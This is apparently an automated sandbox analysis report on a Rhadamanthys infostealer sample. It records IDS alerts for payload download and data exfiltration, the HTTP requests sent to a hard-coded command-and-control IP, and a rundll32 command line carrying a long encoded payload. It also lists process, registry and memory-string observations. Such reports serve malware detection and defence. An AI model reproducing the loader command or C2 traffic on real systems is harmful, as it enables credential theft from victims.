                      Source: C:\Windows\System32\rundll32.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\

                      Networking

                      Source: C:\Windows\System32\rundll32.exe | Network Connect: 179.43.163.126 80
                      Source: Traffic | Snort IDS: 2043202 ET TROJAN Rhadamanthys Stealer - Payload Download Request 192.168.2.5:49700 -> 179.43.163.126:80
                      Source: Traffic | Snort IDS: 2853001 ETPRO TROJAN Rhadamanthys Stealer - Payload Response 179.43.163.126:80 -> 192.168.2.5:49700
                      Source: Traffic | Snort IDS: 2853002 ETPRO TROJAN Rhadamanthys Stealer - Data Exfil 192.168.2.5:49701 -> 179.43.163.126:80
                      Source: Joe Sandbox View | ASN Name: PLI-ASCH PLI-ASCH
                      Source: unknownTCP traffic detected without corresponding DNS query: 179.43.163.126
                      Source: rundll32.exe | String found in binary or memory: https://discord.com
                      Source: rundll32.exe | String found in binary or memory: https://discordapp.com
                      Source: C:\Windows\System32\rundll32.exe | Code function: 4_2_00007DF471DD55E8 WSARecv
                      Source: global traffic | HTTP traffic detected: GET /datalib/vldfce.hrgh HTTP/1.1
                          Host: 179.43.163.126
                          User-Agent: curl/5.9
                          Connection: close
                          X-CSRF-TOKEN: KctemQ4tKWXcCYgf3eHWQEL3RHmmcZPNFotyAWHFHmWP7xAC+WUy1RD6gjKEaUmg9yBshkxOpHoMyOgND4C/XQ==
                          Cookie: CSRF-TOKEN=KctemQ4tKWXcCYgf3eHWQEL3RHmmcZPNFotyAWHFHmWP7xAC+WUy1RD6gjKEaUmg9yBshkxOpHoMyOgND4C/XQ==; LANG=en-US
                      Source: global traffic | HTTP traffic detected: GET /datalib/vldfce.hrgh HTTP/1.1
                          Host: 179.43.163.126
                          User-Agent: curl/5.9
                          Upgrade: websocket
                          Connection: upgrade
                          Sec-Websocket-Version: 13
                          Sec-Websocket-Key: 5p53O3OKTa7Wme0
                      Source: MqE1p1WFrf.exe, 00000001.00000003.311930369.00000000020C1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: DirectDrawCreateEx Callout.
                      Source: MqE1p1WFrf.exe, 00000001.00000003.313283405.0000000002320000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: GetRawInputData
                      Source: Yara match | File source: 1.3.MqE1p1WFrf.exe.2830000.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 1.3.MqE1p1WFrf.exe.2830000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 4.3.rundll32.exe.17ed8ee0000.11.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000001.00000003.310294204.0000000002640000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000001.00000003.310927358.0000000002830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000004.00000003.359030553.0000017ED8C69000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000004.00000003.359569400.0000017ED8EE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: MqE1p1WFrf.exe PID: 3648, type: MEMORYSTR
                      Source: MqE1p1WFrf.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                      Source: C:\Windows\System32\rundll32.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3352 -s 648
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exe | Code function: 1_2_00408616
                      Source: C:\Windows\System32\rundll32.exe | Code function: 4_2_00007FFA06EE12F8
                      Source: C:\Windows\System32\rundll32.exe | Code function: 4_2_00007FFA06EE7088
                      Source: C:\Windows\System32\rundll32.exe | Code function: 4_2_00007FFA06EE4A1C
                      Source: C:\Windows\System32\rundll32.exe | Code function: 4_2_0000017ED6FD22B3
                      Source: C:\Windows\System32\rundll32.exe | Code function: 4_2_0000017ED6FD5094
                      Source: C:\Windows\System32\rundll32.exe | Code function: 4_2_0000017ED6FD5414
                      Source: C:\Windows\System32\rundll32.exe | Code function: 4_2_0000017ED6FD29F8
                      Source: C:\Windows\System32\rundll32.exe | Code function: 4_2_0000017ED6FD5994
                      Source: C:\Windows\System32\rundll32.exe | Code function: 4_2_0000017ED6FD1968
                      Source: C:\Windows\System32\rundll32.exe | Code function: 4_2_0000017ED6FD455C
                      Source: C:\Windows\System32\rundll32.exe | Code function: 4_2_0000017ED6FD2558
                      Source: C:\Windows\System32\rundll32.exe | Code function: 4_2_00007DF471DA8718
                      Source: C:\Windows\System32\rundll32.exe | Code function: 4_2_00007DF471DA36A0
                      Source: C:\Windows\System32\rundll32.exe | Code function: 4_2_00007DF471DA15E4
                      Source: C:\Windows\System32\rundll32.exe | Code function: 4_2_00007DF471DDB0C8
                      Source: C:\Windows\System32\rundll32.exe | Code function: 4_2_00007DF471E08090
                      Source: C:\Windows\System32\rundll32.exe | Code function: 4_2_00007DF471DD1224
                      Source: C:\Windows\System32\rundll32.exe | Code function: 4_2_00007DF471DDD558
                      Source: C:\Windows\System32\rundll32.exe | Code function: 4_2_00007DF471D91530
                      Source: C:\Windows\System32\rundll32.exe | Code function: 4_2_00007DF471E284C4
                      Source: C:\Windows\System32\rundll32.exe | Code function: 4_2_00007DF471DDA3F4
                      Source: C:\Windows\System32\rundll32.exe | Code function: 4_2_00007DF471D903D8
                      Source: C:\Windows\System32\rundll32.exe | Code function: 4_2_00007DF471DE3754
                      Source: C:\Windows\System32\rundll32.exe | Code function: 4_2_00007DF471DF673C
                      Source: C:\Windows\System32\rundll32.exe | Code function: 4_2_00007DF471E136E8
                      Source: C:\Windows\System32\rundll32.exe | Code function: 4_2_00007DF471E1A698
                      Source: C:\Windows\System32\rundll32.exe | Code function: 4_2_00007DF471D9D608
                      Source: C:\Windows\System32\rundll32.exe | Code function: 4_2_00007DF471DD75A8
                      Source: C:\Windows\System32\rundll32.exe | Code function: 4_2_00007DF471E39964
                      Source: C:\Windows\System32\rundll32.exe | Code function: 4_2_00007DF471E41968
                      Source: C:\Windows\System32\rundll32.exe | Code function: 4_2_00007DF471DD1900
                      Source: C:\Windows\System32\rundll32.exe | Code function: 4_2_00007DF471DFF864
                      Source: C:\Windows\System32\rundll32.exe | Code function: 4_2_00007DF471DA9828
                      Source: C:\Windows\System32\rundll32.exe | Code function: 4_2_00007DF471DDB77C
                      Source: C:\Windows\System32\rundll32.exe | Code function: 4_2_00007DF471DD9B34
                      Source: C:\Windows\System32\rundll32.exe | Code function: 4_2_00007DF471E1EB34
                      Source: C:\Windows\System32\rundll32.exe | Code function: 4_2_00007DF471E35B3C
                      Source: C:\Windows\System32\rundll32.exe | Code function: 4_2_00007DF471E16AA0
                      Source: C:\Windows\System32\rundll32.exe | Code function: 4_2_00007DF471DF4A18
                      Source: C:\Windows\System32\rundll32.exe | Code function: 4_2_00007DF471DDC9FC
                      Source: C:\Windows\System32\rundll32.exe | Code function: 4_2_00007DF471DA99F0
                      Source: C:\Windows\System32\rundll32.exe | Code function: 4_2_00007DF471E29D58
                      Source: C:\Windows\System32\rundll32.exe | Code function: 4_2_00007DF471DEBC88
                      Source: C:\Windows\System32\rundll32.exe | Code function: 4_2_00007DF471DD0C58
                      Source: C:\Windows\System32\rundll32.exe | Code function: 4_2_00007DF471D93C68
                      Source: C:\Windows\System32\rundll32.exe | Code function: 4_2_00007DF471DD1C4C
                      Source: C:\Windows\System32\rundll32.exe | Code function: 4_2_00007DF471DD0E98
                      Source: C:\Windows\System32\rundll32.exe | Code function: 4_2_00007DF471E0AE88
                      Source: C:\Windows\System32\rundll32.exe | Code function: 4_2_00007DF471DB6E60
                      Source: C:\Windows\System32\rundll32.exe | Code function: 4_2_00007DF471D9FE38
                      Source: C:\Windows\System32\rundll32.exe | Code function: 4_2_00007DF471E52DE4
                      Source: C:\Windows\System32\rundll32.exe | Code function: 4_2_00007DF471DF0DF0
                      Source: C:\Windows\System32\rundll32.exe | Code function: 4_2_00007DF471DB2FA4 NtUnmapViewOfSection,VirtualAlloc,NtSetInformationFile,NtClose
                      Source: C:\Windows\System32\rundll32.exe | Code function: 4_2_00007DF471DB2834 NtQuerySystemInformation
                      Source: C:\Windows\System32\rundll32.exe | Code function: 4_2_00007DF471DB2E88 NtOpenFile
                      Source: MqE1p1WFrf.exe, 00000001.00000003.310927358.00000000029E2000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameKernelbase.dllj% vs MqE1p1WFrf.exe
                      Source: MqE1p1WFrf.exe, 00000001.00000003.319728017.000000000232D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamerpcrt4.dllj% vs MqE1p1WFrf.exe
                      Source: MqE1p1WFrf.exe, 00000001.00000003.314533170.00000000023A7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamegdi32j% vs MqE1p1WFrf.exe
                      Source: MqE1p1WFrf.exe, 00000001.00000003.315108088.000000000278A000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamegdi32j% vs MqE1p1WFrf.exe
                      Source: MqE1p1WFrf.exe, 00000001.00000003.333746453.00000000020DC000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameimm32j% vs MqE1p1WFrf.exe
                      Source: MqE1p1WFrf.exe, 00000001.00000003.322991562.0000000003EC0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSHELL32.DLLj% vs MqE1p1WFrf.exe
                      Source: MqE1p1WFrf.exe, 00000001.00000003.332966854.00000000020DA000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamePOWRPROF.DLLj% vs MqE1p1WFrf.exe
                      Source: MqE1p1WFrf.exe, 00000001.00000003.308672485.0000000002438000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs MqE1p1WFrf.exe
                      Source: MqE1p1WFrf.exe, 00000001.00000003.316556327.0000000002712000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameOLE32.DLLj% vs MqE1p1WFrf.exe
                      Source: MqE1p1WFrf.exe, 00000001.00000003.326445886.00000000020C9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSHCORE.dllj% vs MqE1p1WFrf.exe
                      Source: MqE1p1WFrf.exe, 00000001.00000002.358376583.00000000025CF000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs MqE1p1WFrf.exe
                      Source: MqE1p1WFrf.exe, 00000001.00000003.311930369.00000000020C1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameApphelpj% vs MqE1p1WFrf.exe
                      Source: MqE1p1WFrf.exe, 00000001.00000003.317707376.0000000002ABE000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCOMBASE.DLLj% vs MqE1p1WFrf.exe
                      Source: MqE1p1WFrf.exe, 00000001.00000003.315606867.0000000002182000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamemsvcp_win.dllj% vs MqE1p1WFrf.exe
                      Source: MqE1p1WFrf.exe, 00000001.00000003.312105202.0000000002270000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameApphelpj% vs MqE1p1WFrf.exe
                      Source: MqE1p1WFrf.exe, 00000001.00000003.309860796.000000000232F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamekernel32j% vs MqE1p1WFrf.exe
                      Source: MqE1p1WFrf.exe, 00000001.00000003.320396311.00000000020C0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamesecurity.dllj% vs MqE1p1WFrf.exe
                      Source: MqE1p1WFrf.exe, 00000001.00000003.310294204.0000000002640000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameKernelbase.dllj% vs MqE1p1WFrf.exe
                      Source: MqE1p1WFrf.exe, 00000001.00000003.314431146.00000000020D4000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameWin32u.DLLj% vs MqE1p1WFrf.exe
                      Source: MqE1p1WFrf.exe, 00000001.00000003.320805149.0000000002640000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: LInternalNameOriginalFileNameProductNameProductVersionCompanyNameLegalCopyrightLegalTrademarksPlatform vs MqE1p1WFrf.exe
                      Source: MqE1p1WFrf.exe, 00000001.00000003.320805149.0000000002640000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSHELL32.DLLj% vs MqE1p1WFrf.exe
                      Source: MqE1p1WFrf.exe, 00000001.00000003.313283405.00000000023BB000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameuser32j% vs MqE1p1WFrf.exe
                      Source: MqE1p1WFrf.exe, 00000001.00000003.341772259.00000000020D6000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamempr.dllj% vs MqE1p1WFrf.exe
                      Source: MqE1p1WFrf.exe, 00000001.00000003.349736272.0000000002184000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamemswsock.dllj% vs MqE1p1WFrf.exe
                      Source: MqE1p1WFrf.exe, 00000001.00000003.349736272.0000000002184000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameadvapi32.dllj% vs MqE1p1WFrf.exe
                      Source: MqE1p1WFrf.exe, 00000001.00000003.316782050.0000000002640000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCOMBASE.DLLj% vs MqE1p1WFrf.exe
                      Source: MqE1p1WFrf.exe, 00000001.00000003.315705538.0000000002137000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamemsvcp_win.dllj% vs MqE1p1WFrf.exe
                      Source: MqE1p1WFrf.exe, 00000001.00000003.316355611.0000000002325000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameOLE32.DLLj% vs MqE1p1WFrf.exe
                      Source: MqE1p1WFrf.exe, 00000001.00000003.331563420.000000000212B000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameadvapi32.dllj% vs MqE1p1WFrf.exe
                      Source: MqE1p1WFrf.exe, 00000001.00000003.334011206.000000000214A000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameOLEAUT32.DLLj% vs MqE1p1WFrf.exe
                      Source: MqE1p1WFrf.exe, 00000001.00000003.325224942.00000000023DE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamemsvcrt.dllj% vs MqE1p1WFrf.exe
                      Source: MqE1p1WFrf.exe, 00000001.00000003.312271989.0000000002647000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameuser32j% vs MqE1p1WFrf.exe
                      Source: MqE1p1WFrf.exe, 00000001.00000003.325515967.00000000024A8000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamemsvcrt.dllj% vs MqE1p1WFrf.exe
                      Source: MqE1p1WFrf.exe, 00000001.00000003.320524869.0000000002113000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamebcryptprimitives.dllj% vs MqE1p1WFrf.exe
                      Source: MqE1p1WFrf.exe, 00000001.00000003.327426446.000000000264D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameWindows.Storage.dllj% vs MqE1p1WFrf.exe
                      Source: MqE1p1WFrf.exe, 00000001.00000003.322991562.00000000039C0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: LInternalNameOriginalFileNameProductNameProductVersionCompanyNameLegalCopyrightLegalTrademarksPlatform vs MqE1p1WFrf.exe
                      Source: MqE1p1WFrf.exe, 00000001.00000003.316124357.0000000002750000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameucrtbase.dllj% vs MqE1p1WFrf.exe
                      Source: MqE1p1WFrf.exe, 00000001.00000003.314477899.00000000020DB000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamegdi32j% vs MqE1p1WFrf.exe
                      Source: MqE1p1WFrf.exe, 00000001.00000003.309988464.0000000002490000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamekernel32j% vs MqE1p1WFrf.exe
                      Source: MqE1p1WFrf.exe, 00000001.00000003.332804586.00000000020D6000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamePROFAPI.DLLj% vs MqE1p1WFrf.exe
                      Source: MqE1p1WFrf.exe, 00000001.00000003.334391183.0000000002110000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamews2_32.dllj% vs MqE1p1WFrf.exe
                      Source: MqE1p1WFrf.exe, 00000001.00000003.320216371.00000000023F0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamerpcrt4.dllj% vs MqE1p1WFrf.exe
                      Source: MqE1p1WFrf.exe, 00000001.00000003.333783737.000000000232C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameOLEAUT32.DLLj% vs MqE1p1WFrf.exe
                      Source: MqE1p1WFrf.exe, 00000001.00000003.332134929.00000000020C0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSHLWAPI.DLLj% vs MqE1p1WFrf.exe
                      Source: MqE1p1WFrf.exe, 00000001.00000003.333673223.00000000020DD000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameWINMMbase.DLLj% vs MqE1p1WFrf.exe
                      Source: MqE1p1WFrf.exe, 00000001.00000003.315893635.000000000232D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameucrtbase.dllj% vs MqE1p1WFrf.exe
                      Source: MqE1p1WFrf.exe, 00000001.00000003.341846355.0000000002110000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemswsock.dllj% vs MqE1p1WFrf.exe
                      Source: MqE1p1WFrf.exe, 00000001.00000003.326182710.00000000020F6000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCFGMGR32.DLLj% vs MqE1p1WFrf.exe
                      Source: MqE1p1WFrf.exe, 00000001.00000003.333316141.00000000020DD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWINMM.DLLj% vs MqE1p1WFrf.exe
                      Source: MqE1p1WFrf.exe, 00000001.00000003.326882570.00000000022EA000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSHCORE.dllj% vs MqE1p1WFrf.exe
                      Source: MqE1p1WFrf.exe, 00000001.00000003.320596267.0000000002100000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesechost.dllj% vs MqE1p1WFrf.exe
                      Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Roaming\nsis_uns60877c.dll 438C088568093AD767802BA5E132EFBD4E643DDF62E4996565C3B46719E3E576
                      Source: MqE1p1WFrf.exe | ReversingLabs: Detection: 64%
                      Source: MqE1p1WFrf.exe | Virustotal: Detection: 68%
                      Source: MqE1p1WFrf.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknown | Process created: C:\Users\user\Desktop\MqE1p1WFrf.exe C:\Users\user\Desktop\MqE1p1WFrf.exe
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Users\user\AppData\Roaming\nsis_uns60877c.dll",PrintUIEntry |5CQkOhmAAAA|1TKr5GsMwYD|67sDqg8OAAl|xYmwxC0TNSO|1k8B3tZkgiyf2sAZQByAG4XAP9sADMAMgAuAKVkHwBs8|AtBQPz8DW|AE8ANgBGOwBjrwAxAHYhAElJAEjvADAAWi0CWUiD|+wo6AQCAABI|4PEKMPMzMxM|4lEJBhIiVQkvxBIiUwkCF0BSP+LRCQwSIkEJPaBAThIbwAISMdE2yQQLQHrDoEBEEjXg8ABjwEQgQFASO05lgBzJZ8Diwwk|0gDyEiLwUiL9UyrAVR7AAPRSIt|yooJiAjrwWYFv2VIiwQlYPPwM||JSItQGEg70f90NkiDwiBIi|8CSDvCdCpmg|94SBh1GkyLQP9QZkGDOGt0B+4REUt1CBEQeBAu|3QFSIsA69VI64tI|QDBagBAU1X|VldBVEFVQVb7QVddAWaBOU1a|02L+EyL8kiL79kPhfzz8ExjSf88QYE8CVBFAO8AD4Xq8|BBi4T7CYjz8IXASI087wEPhNZqEYO8Cd2MLQEPhMfz8ESL|2cgRItfHIt3|yREi08YTAPh|0wD2UgD8TPJv0WFyQ+EpPPwTf+LxEGLEEUz0v9IA9OKAoTAdP8dQcHKDQ++wN76AAFEA9C|EXXs|0GB+qr8DXx0|w6DwQFJg8AE|0E7yXNp68aL|8EPtwxORYss|4tMA+t0WDPtvqoQdFFBixTBANP|M8mKAkyLwuu3D8HJyBEDyOUQAfdBigDVEO0zwDOf9kE7DLbgEKYAg||GAYP4CHLu6|8KSIvLQf|VSd+JBPeDxeQQxATfO28Ycq9mAUFf|0FeQV1BXF9e+11bMxdIgexgAf5kAIvp6Gb+||+|SIXAD4SYdSBM9Y2vAYsrEMgz|+j9m30gjV8ETI1F|0Yz0ovL|1Qk|WiAIEyL4A+Ea3p1IEWoEDPAi9ORIF9IiXwkIKYgcIAgP0iL8A+ES3UgpiD|UEiNVghEjUffQEiNjCSFEUiL79jofP1+II1WSGreIBDiIczz8Ohn7yA|RIsGjVcIQSCmIL1YyiGJhCSAhxLe9vPwiw7aIFiJjCTYcREHMJEg6DHvIIuc|i0yTItdOkiD+|tsSIogMEyJZCTvOEyLpBoyTIlcboQBhCTchxGGko0Ru41HSzCMJPDz8Enfi9To6fwFMIqc7ngySI2EeDJBgPN|IY1PbEQwGKQCf4PpAXXzgbx4Mv8hUmV4dU2LhLsk9CIxlCT4NQHC|0g72HI4g|psv3YzRI1JQPoAlKdBuACYAKYgQMoi+Od0GUS2MMAxSY1U+yRskSBJg+hs6N1rgjBIi86mIHhI|4X|dBKLVUJM|I4wGzFIjUwkQP8P10iBxHQhYSQtCC0B
                      Source: C:\Windows\System32\rundll32.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3352 -s 648
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\MqE1p1WFrf.exe | File created: C:\Users\user\AppData\Roaming\nsis_uns60877c.dll
                      Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@4/1@0/1
                      Source: rundll32.exe | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                      Source: rundll32.exe | Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                      Source: rundll32.exe | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
                      Source: rundll32.exe | Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                      Source: rundll32.exe | Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                      Source: rundll32.exe | Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                      Source: MqE1p1WFrf.exe, 00000001.00000003.320805149.0000000002640000.00000004.00000020.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.322991562.00000000039C0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: @ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/AppExplorer.AssocActionId.BurnSelectionExplorer.AssocActionId.CloseSessionIehistoryIerssJavascriptJscriptLDAPResrloginStickyNotesExplorer.AssocActionId.EraseDiscExplorer.AssocActionId.ZipSelectionExplorer.AssocProtocol.search-msExplorer.BurnSelectionExplorer.CloseSessionExplorer.EraseDiscExplorer.ZipSelectionFile.adp.app.application.appref-ms.asp.bas.cnt.cpftelnettn3270VbscriptwindowsmediacenterappwindowsmediacentersslwindowsmediacenterwebWMP11.AssocProtocol.MMS.ade.hlp.hme.hpj.hta.ins.isp.its.jse.cpl.crd.crds.crt.csh.fxp.gadget.grp.mat.mau.mav.maw.mcf.mda.mde.mdt.ksh.mad.maf.mag.mam.maq.mar.mas.mshxml.mst.ops.pcd.pl.plg.prf.prg.mdw.mdz.msc.msh.msh1.msh1xml.msh2.msh2xml.pvw.plsc.rb.rbw.rdp.rgu.scf.scr.printerexport.provxml.ps2.ps2xml.psc2.py.pyc.pyo.vsw.webpnp.ws.wsc.wsh.xaml.xdp.xip.shb.shs.theme.tsk.vb.vbe.vbp.vsmacros.xnkBRITNLSVDAFIHUNOENDEJAKOTWCNFRHEEUISsr-Latn-CSsr-SP-Latnsr-Cyrl-CSsr-SP-Cyrlsr-Latn-BAELPLRUCSPTSKSLARbs-BA-Latnzh-Hantzh-CHTzh-Hanszh-CHSsr-BA-Latnsr-Cyrl-BAsr-BA-Cyrliu-Latn-CAiu-CA-Latnbs-Cyrl-BAbs-BA-Cyrlbs-Latn-BAdadeelenesfifrhearbgcarmroruhrsksqsvthhuisitjakonlplptfavihyazeuhsbmksttrurukbeetlvlttghimtsegayimskkkytstnvexhzuafkafotateknmlasmrsamnswtkuzttbnpaguorsdsyrsichriuamtzmksbocykmlomyglkokmniibbyoquznsobalbklignefypsfildvbinffhapaparnmohbrugmioccokromtignhawlasoiiar-SAbg-BGca-ESzh-TWcs-CZda-DKde-DEel-GRgswsahqucrwwoprsgdkuja-JPko-KRnl-NLnb-NOpl-PLpt-BRrm-CHro-ROen-USes-ES_tradnlfi-FIfr-FRhe-ILhu-HUis-ISit-ITid-IDuk-UAbe-BYsl-SIet-EElv-LVlt-LTtg-Cyrl-TJru-RUhr-HRsk-SKsq-ALsv-SEth-THtr-TRur-PKts-ZAtn-ZAve-ZAxh-ZAzu-ZAaf-ZAka-GEfo-FOfa-IRvi-VNhy-AMaz-Latn-AZeu-EShsb-DEmk-MKst-ZAtk-TMuz-Latn-UZtt-RUbn-INpa-INgu-INor-INta-
INhi-INmt-MTse-NOyi-001ms-MYkk-KZky-KGsw-KEcy-GBkm-KHlo-LAmy-MMgl-ESkok-INmni-INsd-Deva-INte-INkn-INml-INas-INmr-INsa-INmn-MNbo-CNfy-NLps-AFfil-PHdv-MVbin-NGff-NGha-Latn-NGibb-NGsyr-SYsi-LKchr-Cher-USiu-Cans-CAam-ETtzm-Arab-MAks-Arabne-NPom-ETti-ETgn-PYhaw-USla-001so-SOii-CNpap-029yo-NGquz-BOnso-ZAba-RUlb-LUkl-GLig-NGkr-NGsah-RUquc-Latn-GTrw-RWwo-SNprs-AFgd-GBku-Arab-IQqps-plocarn-CLmoh-CAbr-FRug-CNmi-NZoc-FRco-FRgsw-FRit-CHnl-BEnn-NOpt-PTro-MDru-MDsv-FIur-INqps-plocaar-IQca-ES-valenciazh-CNde-CHen-GBes-MXfr-BEpa-Arab-PKta-LKmn-Mong-CNsd-Arab-PKtzm-Latn-DZks-Deva-INne-INff-Latn-SNaz-Cyrl-AZdsb-DEtn-BWse-SEga-IEms-BNuz-Cyrl-UZbn-BDes-ESfr-CAse-FImn-Mong-MNdz-BTquz-PEar-LYzh-SGquz-ECti-ERqps-Latn-x-shqps-plocmar-EGzh-HKde-ATen-AUzh-MOde-LIen-NZes-CRfr-LUsmj-SEar-MAen-IEde-LUen-CAes-GTfr-CHhr-BAsmj-NOtzm-Tfng-MAar-DZar-OMen-JMes-VEfr-REsms-FIar-YEen-029es-COes-PAfr-MCsma-NOar-TNen-ZAes-DOfr-029sma-SEar-JOen-TTes-ARfr-CMsr-Latn-MEar-LBen-ZWes-ECfr-CDsr-Latn-RSsmn-FIar-SYen-BZes-PEfr-SNsr-Cyrl-RSes-UYfr-MAar-BHen-HKes-PYfr-HTar-QAen-INfr-CIsr-Cyrl-MEar-KWen-PHes-CLfr-MLar-AEen-IDes-419es-CUbs-Cyrlbs-Latnsr-Cyrlsr-Latnsmnaz-Cyrles-BOen-MYes-SVen-SGes-HNes-NIes-PRes-USiu-Canstzm-Tfngnbsrtg-Cyrldsbsmjuz-Latnsmszhnnbsaz-Latnsmauz-Cyrlmn-Cyrlquc-Lat
